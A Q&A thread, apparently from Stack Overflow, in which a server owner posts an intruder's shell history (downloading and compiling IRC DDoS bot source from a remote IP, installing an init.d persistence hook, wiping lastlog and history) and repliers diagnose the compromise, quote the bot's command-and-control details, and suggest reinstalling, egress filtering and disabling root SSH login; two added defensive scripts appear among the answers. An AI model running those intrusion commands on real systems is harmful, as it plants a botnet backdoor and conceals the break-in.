10

We logged remotely into our CentOS server today using Putty, and while wandering through previous commands using the up arrow, stumbled across the following:

unset HISTFILE
mkdir /usr/lib/tmp 
cd /usr/lib/tmp 
wget http://188.72.217.17/mzb.c -o /dev/null
wget http://188.72.217.17/windef.h -o /dev/null
gcc mzb.c -o /bin/bot -lpthread
rm -rf mzb.c
rm -rf windef.h
wget http://188.72.217.17/botsupport.sh -o /dev/null
chmod +x botsupport.sh
mv botsupport.sh /etc/init.d/httpd2
cat /etc/init.d/network > /etc/init.d/network.bp
echo \#\!/bin/sh  >  /etc/init.d/network
echo nohup /etc/init.d/httpd2 \& >> /etc/init.d/network
cat /etc/init.d/network.bp >> /etc/init.d/network
cat /dev/null > /var/log/lastlog
history -c
nohup /etc/init.d/httpd2 &

(&&'s replaced with newlines for clarity)

I never ran these commands, EVER! How did this happen? Is my server being hacked? I immediately changed my root password, but was hoping someone could make heads or tails of what's happening over here.

I see references made in the source to DDoS bots, and my colleague and I are seriously concerned!

Thanks in advance!

Josef van Niekerk
  • Belongs on ServerFault.com – Oded Feb 10 '10 at 20:02
  • Let me be the first to say: This is why you shouldn't be running as root... – Aistina Feb 10 '10 at 20:05
  • I hope you celebrated Backup Awareness Day. I celebrated Restore Awareness Day this week and found my automated deployment to be lacking. May your recovery be easier than mine was. – Mnebuerquo Feb 10 '10 at 20:48
  • Here are a few related questions you should look at. http://serverfault.com/questions/6159/aftermath-of-hack http://serverfault.com/questions/6190/reinstall-after-a-root-compromise http://serverfault.com/questions/57962/whats-wrong-with-always-being-root – Zoredache Feb 10 '10 at 21:13
  • Nice of the hacker to back up your `/etc/init.d/network` file. – ceejayoz Feb 11 '10 at 00:00

6 Answers

7

Yes, you have been hacked. The hacker installed an IRC backdoor and you are connecting to this IRC server:

const  int port      = 1254; 
const char channel[] = "#test";
const char password[]= "pass";
const char server[]  = "heathen.cc";

The bot herder can execute any commands on your server. I recommend shutting down the server and reinstalling immediately. The bot has a few DDoS attack features, DNS flood, syn flood and ICMP flood. It also works on Windows which is pretty cool. There is a really old spreading module to infect myDoom. This looks like some old malware.

Rook
  • This is why you should always have firewall rules that block egress traffic. A properly configured firewall would have blocked this attack from being able to talk to its command and control IRC server. – 3dinfluence Feb 10 '10 at 20:39
  • This wouldn't have prevented the initial intrusion but would have made it more difficult for the attacker to add your server to a botnet. Either way you would have been faced with re-imaging your OS. – 3dinfluence Feb 10 '10 at 20:44
  • "This looks like some old malware." - good thing he was running antivirus on his Linux box to detect this. – ta.speot.is Feb 10 '10 at 22:03
  • @taspeotis +1 for the efficient use of humorous sarcasm... – Joe Internet Feb 11 '10 at 00:39
  • I'm curious, how did you know that (the enemy server, port, UN, PW) from those commands? – John Dec 08 '10 at 05:34
  • @John I dug it out of the mzb.c file that it's downloading and then compiling. – Rook Dec 08 '10 at 17:29
  • @Rook: And you got access to this file by.......visiting the IP in the question and downloading it yourself? – John Dec 09 '10 at 07:16
  • @John Well yeah, the link is right there. It looks like the server is down, which is good. – Rook Dec 09 '10 at 07:24
  • @Rook: OK. Thanks for taking the time to answer me. I'm new at this so I'm trying to learn where I can. – John Dec 09 '10 at 07:34
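Added example, not from Rook's answer or the comments on it: the egress filtering 3dinfluence describes, written as an iptables OUTPUT policy that only lets the host reach the services it needs and logs everything else, plus a small evaluator that checks the generated rules without root. Port 1254 is the C&C port quoted in the answer; the allowed-port lists and the function names are this example's assumptions.

```shell
#!/bin/sh
# Added example, not from Rook's answer or the comments: the egress filtering
# 3dinfluence describes, expressed as an iptables OUTPUT policy that permits
# only the destinations a web server needs and logs everything else. Port
# 1254 is the C&C port quoted in the answer; the allowed-port lists and the
# "print unless --apply" convention are this example's assumptions.

# Outbound destination ports this host legitimately needs (assumed here):
# DNS, HTTP/HTTPS for package updates, NTP. Anything not listed is dropped.
ALLOWED_TCP="53 80 443"
ALLOWED_UDP="53 123"

# Print the iptables commands for the egress policy, one per line.
egress_rules() {
    echo "iptables -F OUTPUT"
    echo "iptables -P OUTPUT DROP"
    echo "iptables -A OUTPUT -o lo -j ACCEPT"
    # Replies on connections that clients opened to us (the web server's own
    # traffic, and the admin's SSH session) keep working.
    echo "iptables -A OUTPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT"
    for p in $ALLOWED_TCP; do
        echo "iptables -A OUTPUT -p tcp --dport $p -j ACCEPT"
    done
    for p in $ALLOWED_UDP; do
        echo "iptables -A OUTPUT -p udp --dport $p -j ACCEPT"
    done
    # Rate-limited log of what the policy drops: a bot trying to reach its
    # IRC server on 1254 shows up here instead of silently connecting.
    echo "iptables -A OUTPUT -m limit --limit 5/min -j LOG --log-prefix 'EGRESS-DROP: '"
}

# Evaluate the generated rules for a NEW outbound connection to PROTO/PORT
# without touching the kernel: the first matching ACCEPT wins, otherwise the
# chain policy from the "-P OUTPUT" line applies.
egress_verdict() {
    proto=$1
    port=$2
    policy=$(egress_rules | sed -n 's/^iptables -P OUTPUT //p')
    hit=$(egress_rules | while read -r line; do
        case "$line" in
            *"-p $proto --dport $port -j ACCEPT") echo ACCEPT; break ;;
        esac
    done)
    echo "${hit:-$policy}"
}

# Usage: sh egress.sh          (print the rules for review)
#        sh egress.sh --apply  (apply them, as root)
if [ "${1:-}" = "--apply" ]; then
    egress_rules | sh -e
else
    egress_rules
fi
```

With this in place the bot's connection to port 1254 is dropped and logged rather than established, which is the detection opportunity 3dinfluence is pointing at; it does nothing against the initial break-in, so it complements, not replaces, the reinstall.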
6

The answer is in any case yes, your server is being or has been compromised.

You should cut off the Internet connection to the server immediately, make a full backup (bear in mind other files may be compromised, too), and reinstall.

Also, you may want to notify the owners of the IP the bot net (or whatever this is) is run from. Here is the RIPE whois data.

Pekka
1

Never allow root login via SSH.

Peter D
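Added example, not part of Peter D's answer: a script that reports the effective PermitRootLogin value in an sshd_config and writes a corrected copy. It follows sshd's rule that the first uncommented occurrence of a keyword wins and that settings inside a Match block apply only there; the function names and the ".hardened" output name are this example's own.

```shell
#!/bin/sh
# Added example, not part of Peter D's answer: check an sshd_config for the
# setting his answer is about and produce a corrected copy. sshd honours the
# first uncommented occurrence of a keyword, and settings inside a "Match"
# block only apply to that block, so only the global section before the
# first Match is consulted. The function names are this example's own.

# Print the effective global PermitRootLogin value from FILE (lower-cased),
# or "unset" when the file does not set it and sshd's version default applies.
permit_root_login() {
    awk '
        tolower($1) == "match" { exit }
        tolower($1) == "permitrootlogin" { print tolower($2); found = 1; exit }
        END { if (!found) print "unset" }
    ' "$1"
}

# Succeed only when root login over SSH is fully disabled. Values such as
# "without-password" / "prohibit-password" still allow key-based root logins,
# which is not what the answer recommends, so they do not count.
root_login_hardened() {
    [ "$(permit_root_login "$1")" = no ]
}

# Write a corrected copy of IN to OUT: "PermitRootLogin no" becomes the first
# (hence effective) line and every existing PermitRootLogin line is commented
# out so the original intent stays visible for review.
harden_sshd_config() {
    awk '
        BEGIN { print "PermitRootLogin no" }
        tolower($1) == "permitrootlogin" { print "#" $0; next }
        { print }
    ' "$1" > "$2"
}

# Usage: sh check-root-login.sh /etc/ssh/sshd_config
#        (review the proposed file, replace the original, then restart sshd)
if [ -n "${1:-}" ]; then
    echo "PermitRootLogin is: $(permit_root_login "$1")"
    if root_login_hardened "$1"; then
        echo "OK: root login over SSH is disabled"
    else
        harden_sshd_config "$1" "$1.hardened"
        echo "proposed fix written to $1.hardened"
    fi
fi
```

Test the proposed file with `sshd -t -f /etc/ssh/sshd_config.hardened` before swapping it in, and keep an existing session open while restarting sshd so a mistake cannot lock you out.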
0

The answer to your question is: YES

cherouvim
0

Sounds like you've been infected with BOT_VERSION where BOT_VERSION is

#define BOT_VERSION "Linux/Unix IRC DDoS bot ver "BIN_VERSVION" by ["CRED"MZђ"CEND"]. Supported features : "FEATURES

Didn't your Linux antivirus pick this up?

ta.speot.is
0

I probably would have sanitized the IP address of the C&C machine before posting.

jbroome